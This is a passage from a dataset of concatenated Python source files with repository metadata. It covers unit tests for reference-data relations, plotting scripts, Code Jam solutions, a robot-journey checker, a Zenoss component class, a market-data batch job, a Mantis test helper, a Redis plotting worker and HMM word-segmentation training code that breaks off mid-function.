self.assertTrue(refdata.validate_relation_data(data1, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data1, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data4, validators))\n\n validators = refdata.get_relation_record_validators(rel_recs[1])\n self.assertEqual(set(validators.keys()), {\"from\", \"to\"})\n\n self.assertTrue(refdata.validate_relation_data(data2, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data4, validators))\n\n rel_recs = refdata.get_relation_records(\"company\",\n \"company\",\n \"retailer_branding\",\n \"retail_segment\",\n \"retail_parent\")\n self.assertEqual(len(rel_recs), 2)\n\n validators = refdata.get_relation_record_validators(rel_recs[0])\n self.assertEqual(set(validators.keys()), {\"from\", \"to\"})\n\n self.assertTrue(refdata.validate_relation_data(data2, data1, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data4, validators))\n\n validators = refdata.get_relation_record_validators(rel_recs[1])\n self.assertEqual(set(validators.keys()), {\"from\", \"to\"})\n\n self.assertTrue(refdata.validate_relation_data(data3, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data2, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data3, validators))\n self.assertFalse(refdata.validate_relation_data(data1, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data2, data4, validators))\n self.assertFalse(refdata.validate_relation_data(data3, data4, validators))\n\n ##---------------------------------- Test Relation Types - Setters ----------------------------##\n\n def test_relation_type_setters(self):\n\n refdata = self.__refdata_standard_init()\n context_data = {\n \"source\": \"test_reference_data.py\",\n \"user_id\": None\n }\n refdata.register_context(context_data)\n\n self.assertRaises(InputError, lambda s: refdata.add_relation_type(s), \"rel1\")\n self.assertFalse(refdata.is_valid_relation_type(\"rel2\"))\n refdata.add_relation_type(\"rel2\")\n self.assertTrue(refdata.is_valid_relation_type(\"rel2\"))\n self.assertEqual(refdata.get_relation_records(\"e1\", \"e2\", relation_types = [\"rel2\"]), [])\n refdata.del_relation_type(\"rel2\")\n self.assertRaises(InputError, lambda s: refdata.del_relation_type(s), \"rel2\")\n\n refdata.add_relation_type(\"rel2\")\n refdata.add_relation_record(\"rel2\", \"e1\", \"role A\", {}, \"e2\", \"role B\", {})\n self.assertEqual(len(refdata.get_relation_records(\"e1\", \"e2\")), 3)\n refdata.add_relation_record(\"rel2\", \"e2\", \"role C\", {}, \"e3\", \"role D\", {\"data.t\":\"T\"})\n self.assertEqual(len(refdata.get_relation_records(\"e2\", \"e3\")), 1)\n refdata.del_relation_record(\"rel2\", \"e2\", \"role C\", {}, \"e3\", \"role D\", {\"data.t\":\"T\"})\n self.assertEqual(len(refdata.get_relation_records(\"e2\", \"e3\")), 0)\n\n ##-------------------------------------------------------------------------------------------##\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"erezrubinstein/aa","sub_path":"tests/unit_tests/core_tests/business_logic_tests/test_reference_data.py","file_name":"test_reference_data.py","file_ext":"py","file_size_in_byte":15364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17761313072","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\nplt.rcParams[\"figure.figsize\"] = [7.50, 3.50]\nplt.rcParams[\"figure.autolayout\"] = True\nfilepath = \"/Users/Charlie/Library/Mobile Documents/com~apple~CloudDocs/Knowledge_Engineering/train.csv2022-06-04 01:37:39 acc_evo.csv\"\ndf1 = pd.read_csv(filepath)\ndf1.set_index('epoch').plot()\nplt.title('Accuracy Evolution')\nplt.show()","repo_name":"Aequatio-Space/ASAP-ACSA","sub_path":"4 - plot.py","file_name":"4 - plot.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43939793075","text":"# 递归案例——计算数字累加\n\"\"\"\n定义一个函数sum_numbers\n能够接收一个num的整数参数\n计算1+2+3+...+num的结果\n\"\"\"\n\n\ndef sun_numbers(num):\n if num == 1:\n return 1\n # 假设sum_numbers 能够完成 num - 1 的累加\n temp = sun_numbers(num - 1)\n\n # 函数内部的核心算法就是两个数字的相加\n return num + temp\n\n\nprint(sun_numbers(3))\n","repo_name":"showyouhappiness/Python_study","sub_path":"递归/递归-相加.py","file_name":"递归-相加.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2887111338","text":"import jobs\nfrom hotqueue import HotQueue\nimport redis\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt \nimport json\n\nq = HotQueue(\"queue\", host=sys.argv[1], port=6379, db=1)\nrd = redis.StrictRedis(host=sys.argv[1], port=6379, db=0)\njd = redis.StrictRedis(host=sys.argv[1], port=6379, db=2)\n\n@q.worker\ndef execute_job(jid):\n \n jobs.update_job_status(jid, 'in progress')\n\n jobid = jobs.generate_job_key(jid).encode()\n\n job_info = jd.hgetall(jobid)\n \n data = json.loads(rd.get('vehicle_emissions'))\n plt.figure()\n if job_info['plot_type'.encode()].decode() == \"bar\":\n field_1 = job_info['field_1'.encode()].decode()\n field_2 = job_info['field_2'.encode()].decode()\n x_axis = []\n y_axis = []\n total = 0\n iters = 0\n for row in data['vehicle_emissions']:\n if row[field_1] not in x_axis:\n x_axis.append(row[field_1])\n\n for row in x_axis:\n for wor in data['vehicle_emissions']:\n if row == wor[field_1]:\n iters += 1\n total += float(wor[field_2])\n\n average = total/iters\n y_axis.append(average)\n iters = 0\n total = 0\n\n plt.bar(x_axis, y_axis, width = 0.3)\n plt.xticks(rotation=90)\n plt.title('{} vs {}'.format(field_1, field_2))\n plt.xlabel(field_1)\n plt.ylabel(field_2)\n plt.tight_layout()\n plt.savefig('bar_plot.png')\n \n with open('bar_plot.png', 'rb') as f:\n img = f.read()\n\n jd.hset(jobid, 'image', img)\n jd.hset(jobid, 'status', 'finished')\n\n elif job_info['plot_type'.encode()].decode() == \"scatter\":\n\n field_1 = job_info['field_1'.encode()].decode()\n field_2 = job_info['field_2'.encode()].decode()\n x_axis = []\n y_axis = []\n\n for row in data['vehicle_emissions']:\n x_axis.append(float(row[field_1]))\n\n for row in data['vehicle_emissions']:\n y_axis.append(float(row[field_2]))\n\n plt.scatter(x_axis, y_axis, c = \"red\", s=2)\n\n plt.title('{} vs {}'.format(field_1, field_2))\n plt.xlabel(field_1)\n plt.ylabel(field_2)\n plt.savefig('scatter_plot.png')\n\n with open('scatter_plot.png', 'rb') as f:\n img = f.read()\n\n jd.hset(jobid, 'image', img)\n jd.hset(jobid, 'status', 'finished')\n\n else:\n jd.hset(jobid, 'status', 'cancelled (invalid job type)')\n\nexecute_job()\n","repo_name":"geovbra/vehicle-emissions-data-analyzer","sub_path":"src/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23572049321","text":"t = int(input())\r\nfor a0 in range(t):\r\n n, k = map(int, input().strip().split(' '))\r\n\r\n N = 1\r\n NN = 1\r\n while N <= n:\r\n NN += 1\r\n N = 2**NN - 1\r\n NN -= 1\r\n N = 2**NN-1\r\n a = n-N\r\n\r\n M = 1\r\n while M <= k:\r\n M *= 2\r\n M //= 2\r\n b = k - M\r\n\r\n result = ((N+1)//M - 2) + (a+M-1-b)//M\r\n\r\n if result % 2 == 0:\r\n print(\"Case #\" + str(a0 + 1) + \": \" + str(result//2) + \" \" + str(result//2))\r\n else:\r\n print(\"Case #\" + str(a0 + 1) + \": \" + str((result+1)//2) + \" \" + str((result-1)//2))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/326.py","file_name":"326.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6832211605","text":"a = {\n \"name\": \"yerassyl\",\n \"age\": 16,\n \"salary\": 2000,\n \"experience\": 2,\n}\nb = {\n \"name\": \"kirito\",\n \"age\": 18,\n \"salary\": 3000,\n \"experience\": 3,\n}\nc = {\n \"name\": \"lasdlsd\",\n \"age\": 22,\n \"salary\": 400,\n \"experience\": 4,\n}\npeoples = [a, b, c]\nfor person in peoples:\n print(person[\"name\"], person[\"salary\"], person[\"age\"])\nsumi = 0\nn = len(peoples)\nfor person in peoples:\n sumi = sumi + person[\"salary\"]\nprint(sumi / n)\n","repo_name":"kirigaikabuto/Python19Lessons","sub_path":"lesson16/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3896934655","text":"import argparse\nfrom enum import Enum, auto\nfrom dataclasses import dataclass\nfrom typing import List, Tuple\nfrom functools import reduce\n\n\nclass Direction(Enum):\n North = auto()\n East = auto()\n South = auto()\n West = auto()\n\n\nclass Command(Enum):\n Left = auto()\n Right = auto()\n Forward = auto()\n\n\n@dataclass()\nclass Position:\n x: int\n y: int\n\n def as_tuple(self):\n return self.x, self.y\n\n\n@dataclass()\nclass Robot:\n position: Position\n direction: Direction\n\n\n@dataclass()\nclass Journey:\n start: Robot\n end: Robot\n commands: List[Command]\n\n\ndirection_map = {\n \"N\": Direction.North,\n \"E\": Direction.East,\n \"S\": Direction.South,\n \"W\": Direction.West,\n}\n\n\ncommand_map = {\n \"L\": Command.Left,\n \"R\": Command.Right,\n \"F\": Command.Forward,\n}\n\n\ndef parse_robot(line: str) -> Robot:\n parts = line.split()\n x = int(parts[0])\n y = int(parts[1])\n direction = direction_map[parts[2]]\n\n return Robot(position=Position(x=x, y=y), direction=direction)\n\n\ndef handle_command(robot: Robot, command: Command):\n # possibly treating auto enums as ints is a bit too magic, depending on taste a more explicit mapping might be preferred\n if command == Command.Left:\n val = robot.direction.value - 1\n new_direction = (\n Direction.West if val < Direction.North.value else Direction(val)\n )\n new_position = robot.position\n\n elif command == Command.Right:\n val = robot.direction.value + 1\n new_direction = (\n Direction.North if val > Direction.West.value else Direction(val)\n )\n new_position = robot.position\n\n else: # command == Command.Forward:\n new_direction = robot.direction\n x = robot.position.x\n y = robot.position.y\n if robot.direction == Direction.North:\n new_position = Position(x=x, y=y + 1)\n elif robot.direction == Direction.East:\n new_position = Position(x=x + 1, y=y)\n elif robot.direction == Direction.South:\n new_position = Position(x=x, y=y - 1)\n else: # robot.direction == Direction.West:\n new_position = Position(x=x - 1, y=y)\n\n return Robot(new_position, new_direction)\n\n\ndef is_journey_valid(lines: List[str]) -> Tuple[bool, Robot]:\n start = parse_robot(lines[0])\n commands = [command_map[c] for c in lines[1]]\n proposed_end = parse_robot(lines[2])\n\n # possibly reduce() is unpythonic, depending on taste a standard for loop might be preferred\n actual_end = reduce(handle_command, commands, start)\n\n return (\n proposed_end.direction == actual_end.direction\n and proposed_end.position.as_tuple() == actual_end.position.as_tuple()\n ), actual_end\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Process robot journeys.\")\n parser.add_argument(\"file_path\", help=\"path to input file\")\n\n args = parser.parse_args()\n\n with open(args.file_path, \"r\") as f:\n result = is_journey_valid(f.readlines())\n print(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jamesjrg/python-playground","sub_path":"robot-journeys/journeys.py","file_name":"journeys.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23564721761","text":"def solve(N):\n if not N:\n return ''\n lb = '9' * len(N)\n while int(lb) > int(N) and lb[0] > '1':\n lb = chr(ord(lb[0]) - 1) * len(N)\n if int(lb) > int(N):\n return solve('9' * (len(N) - 1))\n if lb[0] < N[0]:\n return lb[0] + '9' * (len(N) - 1)\n return lb[0] + solve(N[1:])\n\nfor t in range(1, int(input())+1):\n N = input()\n print(\"Case #{}: {}\".format(t, solve(N)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/561.py","file_name":"561.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17613785403","text":"__doc__=\"\"\"Fan\n\nFan is an abstraction of any fan on a device. CPU, chassis, etc.\n\n$Id: Fan.py,v 1.7 2004/04/06 22:33:24 edahl Exp $\"\"\"\n\n__version__ = \"$Revision: 1.7 $\"[11:-2]\n\nfrom AccessControl.class_init import InitializeClass\nfrom math import isnan\nfrom Products.ZenRelations.RelSchema import *\n\nfrom HWComponent import HWComponent\n\nfrom Products.ZenModel.ZenossSecurity import *\n\nclass Fan(HWComponent):\n \"\"\"Fan object\"\"\"\n\n portal_type = meta_type = 'Fan'\n\n state = \"unknown\"\n type = \"unknown\"\n\n _properties = HWComponent._properties + (\n {'id':'state', 'type':'string', 'mode':'w'},\n {'id':'type', 'type':'string', 'mode':'w'},\n )\n\n _relations = HWComponent._relations + (\n (\"hw\", ToOne(ToManyCont, \"Products.ZenModel.DeviceHW\", \"fans\")),\n )\n\n \n factory_type_information = ( \n { \n 'id' : 'Fan',\n 'meta_type' : 'Fan',\n 'description' : \"\"\"Arbitrary device grouping class\"\"\",\n 'icon' : 'Fan_icon.gif',\n 'product' : 'ZenModel',\n 'factory' : 'manage_addFan',\n 'immediate_view' : 'viewFan',\n 'actions' :\n ( \n { 'id' : 'status'\n , 'name' : 'Status'\n , 'action' : 'viewFan'\n , 'permissions' : ('View',)\n },\n { 'id' : 'perfConf'\n , 'name' : 'Template'\n , 'action' : 'objTemplates'\n , 'permissions' : (\"Change Device\", )\n },\n )\n },\n )\n\n\n def rpmString(self):\n \"\"\"\n Return a string representation of the RPM\n \"\"\"\n rpm = self.rpm()\n return rpm is None and \"unknown\" or \"%lrpm\" % (rpm,)\n\n\n def rpm(self, default=None):\n \"\"\"\n Return the current RPM\n \"\"\"\n rpm = self.cacheRRDValue('rpm', default)\n if rpm is not None and not isnan(rpm):\n return long(rpm)\n return None\n\n\n def viewName(self):\n return self.id\n name = viewName\n\n\nInitializeClass(Fan)\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/Fan.py","file_name":"Fan.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"3721942016","text":"from market_data import UpdateMarketData, UpdateDaily, MacroData, EtfData\nfrom hot_issue import UpdateHotIssue\nfrom hot_theme import UpdateHotTheme\nfrom index_data.theme import ThemeIndex\nfrom exp_return import UpdateExpReturn\nfrom datetime import datetime\nimport momentum.create_fields\nimport lib\n\n\ndef main():\n\n # 업데이트: 종목 마켓데이터(key:cmp_cd)\n is_update_all = False\n update_market_data = UpdateMarketData(is_update_all)\n update_market_data.run()\n del update_market_data\n\n # 업데이트: 종목 마켓데이터(key:date)\n is_update_all = False\n update_daily = UpdateDaily(is_update_all)\n update_daily.run()\n del update_daily\n\n # 업데이트: 종목 마켓데이터(기간 변화율)\n c_chg_freq = lib.StockChgFreq()\n c_chg_freq.run()\n del c_chg_freq\n\n # 업데이트: 매크로 데이터\n MacroData().run()\n\n # 업데이트: 매크로 데이터\n EtfData().run()\n\n # 업데이트: 모멘텀 데이터 생성 (Stock)\n momentum.create_fields.create_stock_field()\n\n # 업데이트: 일별 핫이슈 종목 정보\n update_hot_issue = UpdateHotIssue()\n update_hot_issue.update_hot_issue_date()\n del update_hot_issue\n\n # 업데이트: 일별 주요 테마 정보\n UpdateHotTheme.update_hot_theme(False)\n\n # 업데이트: 인덱스(테마)\n c_theme_index = ThemeIndex(datetime(2006, 1, 1), datetime.today())\n c_theme_index.run()\n del c_theme_index\n\n # 업데이트: 인덱스(테마)(기간 변화율)\n c_chg_freq = lib.ThemeChgFreq()\n c_chg_freq.run()\n del c_chg_freq\n\n # 업데이트: 종목별 기대수익률\n UpdateExpReturn().run()\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"song-junho/DailyBatch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35368428185","text":"\"\"\"update users table to include allowed hospitals\n\nRevision ID: bc96b4274043\nRevises: 72caed04d5fa\nCreate Date: 2021-02-08 07:57:32.961869\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bc96b4274043'\ndown_revision = '72caed04d5fa'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('allowed_hospitals', sa.JSON(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'allowed_hospitals')\n # ### end Alembic commands ###\n","repo_name":"codeforpakistan/LabTech","sub_path":"backend/app/alembic/versions/bc96b4274043_update_users_table_to_include_allowed_.py","file_name":"bc96b4274043_update_users_table_to_include_allowed_.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7868676551","text":"from model.project import Project\n\nclass MantisHelper:\n\n def __init__(self, app):\n self.app = app\n\n def open_main_page(self):\n wd = self.app.wd\n # open contacts page\n if not wd.current_url.endswith(\"/my_view_page.php\"):\n self.app.open_home_page()\n\n def open_projects_page(self):\n wd = self.app.wd\n wd.find_element_by_link_text(\"Manage\").click()\n wd.find_element_by_link_text(\"Manage Projects\").click()\n\n def add_project(self, project):\n wd = self.app.wd\n self.open_main_page()\n self.open_projects_page()\n wd.find_element_by_xpath(\"//input[@value='Create New Project']\").click()\n self.fill_project_form(project)\n wd.find_element_by_xpath(\"//input[@value='Add Project']\").click()\n self.project_cache = None\n\n def fill_project_form(self, project):\n wd = self.app.wd\n self.change_field_value(\"name\", project.name)\n self.change_field_value(\"description\", project.description)\n wd.find_element_by_css_selector('select[name=\"status\"] > option[value=%s]' % project.status).click()\n wd.find_element_by_css_selector('select[name=\"view_state\"] > option[value=%s]' % project.viewstate).click()\n\n def change_field_value(self, field_name, text):\n wd = self.app.wd\n if text is not None:\n wd.find_element_by_name(field_name).click()\n wd.find_element_by_name(field_name).clear()\n wd.find_element_by_name(field_name).send_keys(text)\n\n project_cache = None\n\n def get_project_list(self):\n if self.project_cache is None:\n wd = self.app.wd\n self.open_main_page()\n self.open_projects_page()\n self.project_cache = []\n for row in wd.find_elements_by_xpath(\"//table[@class='width100']\")[1].find_elements_by_css_selector(\".row-1, .row-2\"):\n cells = row.find_elements_by_tag_name(\"td\")\n name = cells[0].text\n description = cells[4].text\n status = cells[1].text\n viewstate = cells[3].text\n self.project_cache.append(Project(name=name, status=status, viewstate=viewstate, description=description))\n return list(self.project_cache)\n\n def select_project_by_index(self, index):\n wd = self.app.wd\n # select contact\n wd.find_elements_by_xpath(\"//table[@class='width100']\")[1].find_elements_by_css_selector(\"a[href *= 'manage_proj_edit_page']\")[index].click()\n\n def delete_project(self, index):\n wd = self.app.wd\n self.open_main_page()\n self.open_projects_page()\n self.select_project_by_index(index)\n wd.find_element_by_xpath(\"//input[@value='Delete Project']\").click()\n wd.find_element_by_xpath(\"//input[@value='Delete Project']\").click()\n self.project_cache = None\n","repo_name":"blotskaya/mantis","sub_path":"fixture/mantis.py","file_name":"mantis.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7116662902","text":"# 2292\n\n# 어떤 식으로 작동하는지, 지나가는 방의 수의 규칙을 찾아보도록 하자.\n# 굳이 1, 7, 19, 37, ...의 일반항을 구할 필요까지는 없었다.\n# 그래도 결과적으론 잘 파악했으니, 일단은 칭찬!\n\n# 파이썬에는 ++가 없다. += 이런 식으로 작성하자.\n\n\n# 베껴온 코드\n##n = int(input())\n##\n##nums_pileup = 1 # 벌집의 개수, 1개부터 시작\n##cnt = 1\n##while n > nums_pileup :\n## nums_pileup += 6 * cnt # 벌집이 6의 배수로 증가\n## cnt += 1 # 반복문을 반복하는 횟수\n##print(cnt)\n\n# 일반항 구해서 내가 직접 생각한 코드\nn = int(input())\nr = 1\nmore = True # 계속 작업하시오\n\nif (n == r):\n print(r)\nelse:\n r += 1\n while (more):\n if (((3*(r - 1)**2 - 3 * (r - 1) + 1) < n) and (n <= (3*r**2 - 3*r +1))):\n print(r)\n more = False\n else:\n r += 1\n","repo_name":"soohyeon21/study","sub_path":"BaekJoon/step8_math1/8_2_b2_2292.py","file_name":"8_2_b2_2292.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1431146214","text":"# -*- coding: utf-8 -*-\nfrom urllib import request\nimport json\ndef fetch_data(url):\n req = request.Request(url)\n data = None\n with request.urlopen(req) as r:\n data = json.loads(str(r.read(),encoding=\"utf-8\"))\n return data\n\n\n \n# 测试\nURL = 'https://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20weather.forecast%20where%20woeid%20%3D%202151330&format=json'\ndata = fetch_data(URL)\nprint(data)\nassert data['query']['results']['channel']['location']['city'] == 'Beijing'\nprint('ok')","repo_name":"kumaeki/python_introduction","sub_path":"do_lib_urllib_practise.py","file_name":"do_lib_urllib_practise.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2014515693","text":"import boto3\nfrom urllib.parse import unquote_plus\nimport os\ns3_client = boto3.client('s3')\n\n\ndef run(event, context):\n initial_event_bucket = event['initial_event_bucket']\n original_file_name = event['file_name']\n clean_file_name = unquote_plus(original_file_name) #limpia de caracteres especiales\n\n #copio en path destino\n destination_file_name = clean_file_name.replace(\"source\", \"destination\")\n\n copy_source_object = {'Bucket': initial_event_bucket, 'Key': clean_file_name}\n destination_bucket = os.environ['destiny_bucket']\n\n print(f\"bucket inicial \"+initial_event_bucket+\" Key destiny: \"+destination_file_name)\n\n s3_client.copy_object(CopySource=copy_source_object, Bucket=destination_bucket , Key=destination_file_name)\n\n print(\" BUCKET: \" + initial_event_bucket + \" KEY: \" + destination_file_name)","repo_name":"rsradulescu/cloudformation_dynamoparameter","sub_path":"functions/003_csvfile_lambda/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73412169793","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path(\"register\", views.register, name=\"register\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"journal\", views.journal, name=\"journal\"),\n path(\"journal/add\", views.add_journal, name=\"add_journal\"),\n path(\"journal/edit/\", views.edit_journal, name=\"edit_journal\"),\n path(\"journal/delete/\", views.delete_journal, name=\"delete_journal\"),\n path(\"bloombot\", views.bloombot, name=\"bloombot\"),\n path(\"todos\", views.todos, name=\"todos\"),\n path(\"add_todo\", views.add_todo, name=\"add_todo\"),\n path(\"privacy-policy\", views.privacy_policy, name=\"privacy-policy\"),\n path(\"blog\", views.blog, name=\"blog\"),\n path(\"blog/\", views.blog_post, name=\"blog_post\"),\n path(\"resources\", views.resources, name=\"resources\"),\n\n # API routes\n path(\"todos/changed/checked/\", views.check_todo, name=\"check_todo\"),\n path(\"todos/changed/unchecked/\", views.uncheck_todo, name=\"uncheck_todo\"),\n path(\"todos/changed/delete/\", views.delete_todo, name=\"delete_todo\"),\n]","repo_name":"Treasure-Mayowa/BloomDev","sub_path":"render/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26088638345","text":"class Solution(object):\n def characterReplacement(self, s, k):\n \"\"\"\n :type s: str\n :type k: int\n :rtype: int\n \"\"\"\n count = {}\n l = 0\n r = 0\n res = 0\n for r in range(len(s)):\n count[s[r]] = 1 + count.get(s[r], 0)\n freq = max(count.values())\n while (r - l + 1) - freq > k:\n count[s[l]] -= 1\n l += 1\n res = max(res, r - l + 1)\n return res","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"0424-longest-repeating-character-replacement/0424-longest-repeating-character-replacement.py","file_name":"0424-longest-repeating-character-replacement.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18375173764","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/1/3 7:50 PM\n# @Author : WittonZhou\n# @File : HMM.py\n\nimport numpy as np\nimport time\n'''\nHMM模型\n'''\n\n\ndef load_data(filename):\n \"\"\"\n 加载数据集\n :param filename: \n :return: \n \"\"\"\n artical = []\n with open(filename, encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n artical.append(line)\n return artical\n\n\ndef train(filename):\n \"\"\"\n 依据训练文本统计PI、A、B\n :param filename: \n :return: \n \"\"\"\n # 定义一个查询字典,用于映射四种标记在数组中对应的位置,方便查询\n # B:词语的开头\n # M:一个词语的中间词\n # E:一个词语的结果\n # S:非词语,单个词\n statusDict = {'B': 0, 'M': 1, 'E': 2, 'S': 3}\n\n # 每个字只有四种状态,所以下方的各类初始化中大小的参数均为4\n # 初始化PI的一维数组,因为对应四种状态,大小为4\n PI = np.zeros(4)\n # 初始化状态转移矩阵A,涉及到四种状态各自到四种状态的转移,因为大小为4x4\n A = np.zeros((4, 4))\n # 初始化观测概率矩阵,分别为四种状态到每个字的发射概率\n # 因为是中文分词,使用ord(汉字)即可找到其对应编码,这里用一个65536的空间来保证对于所有的汉字都能\n # 找到对应的位置来存储\n B = np.zeros((4, 65536))\n # 读训练文本\n with open(filename, encoding='utf-8') as f:\n # 文本中的每一行认为是一个训练样本\n # 在统计上,三个参数依据“10.3.2” Baum-Welch算法内描述的统计\n # PI依据式10.35\n # A依据10.37\n # B依据10.38\n # 注:并没有使用Baum-Welch算法,只是借助了其内部的三个参数生成公式,其实\n # 公式并不是Baum-Welch特有的,只是在那一节正好有描述\n for line in f.readlines():\n # 对单行句子按空格进行切割\n current_line = line.strip().split()\n # 对词性的标记放在该列表中\n wordLabel = []\n # 对每一个单词进行遍历\n for i in range(len(current_line)):\n # 如果长度为1,则直接将该��标记为S,即单个词\n if len(current_line[i]) == 1:\n label = 'S'\n else:\n # 如果长度不为1,开头为B,最后为E,中间添加长度-2个M\n # 如果长度刚好为2,长度-2=0也就不添加了,反之添加对应个数的M\n label = 'B' + 'M' * (len(current_line[i]) - 2) + 'E'\n\n # 如果是单行开头第一个字,PI中对应位置加1,\n if i == 0:\n PI[statusDict[label[0]]] += 1\n\n # 对于该单词中的每一个字,在生成的状态链中统计B\n for j in range(len(label)):\n # 遍历状态链中每一个状态,并找到对应的中文汉字,在B中对应位置加1\n B[statusDict[label[j]]][ord(current_line[i][j])] += 1\n\n # 在整行的状态链中添加该单词的状态链\n # 注意:extend表直接在原先元素的后方添加,可以百度一下extend和append的区别\n wordLabel.extend(label)\n\n # 单行所有单词都结束后,统计A信息\n # 因为A涉及到前一个状态,因此需要等整条状态链都生成了才能开始统计\n for i in range(1, len(wordLabel)):\n # 统计t时刻状态和t-1时刻状态的所有状态组合的出现次数\n A[statusDict[wordLabel[i - 1]]][statusDict[wordLabel[i]]] += 1\n\n # 上面代码在统计上全部是统计的次数,实际运算需要使用概率,\n # 下方代码是将三个参数的次数转换为概率\n # ----------------------------------------\n # 对PI求和,概率生成中的分母\n sum = np.sum(PI)\n # 遍历PI中每一个元素,元素出现的次数/总次数即为概率\n for i in range(len(PI)):\n # 如果某元素没有出现过,该位置为0,在后续的计算中这是不被允许的\n # 比如说某个汉字在训练集中没有出现过,那在后续不同概率相乘中只要有\n # 一项为0,其他都是0了,此外整条链很长的情况下,太多0-1的概率相乘\n # 不管怎样最后的结果都会很小,很容易下溢出\n # 所以在概率上我们习惯将其转换为log对数形式,这在书上是没有讲的\n # x大的时候,log也大,x小的时候,log也相应小,我们最后比较的是不同\n # 概率的大小,所以使用log没有问题\n\n # 那么当单向概率为0的时候,log没有定义,因此需要单独判断\n # 如果该项为0,则手动赋予一个极小值\n if PI[i] == 0:\n PI[i] = -3.14e+100\n # 如果不为0,则计算概率,再对概率求log\n else:\n PI[i] = np.log(PI[i] / sum)\n\n # 与上方PI思路一样,求得A的概率对数\n for i in range(len(A)):\n sum = np.sum(A[i])\n for j in range(len(A[i])):\n if A[i][j] == 0:\n A[i][j] = -3.14e+100\n else:\n A[i][j] = np.log(A[i][j] / sum)\n\n # 与上方PI思路一样,求得B的概率对数\n for i in 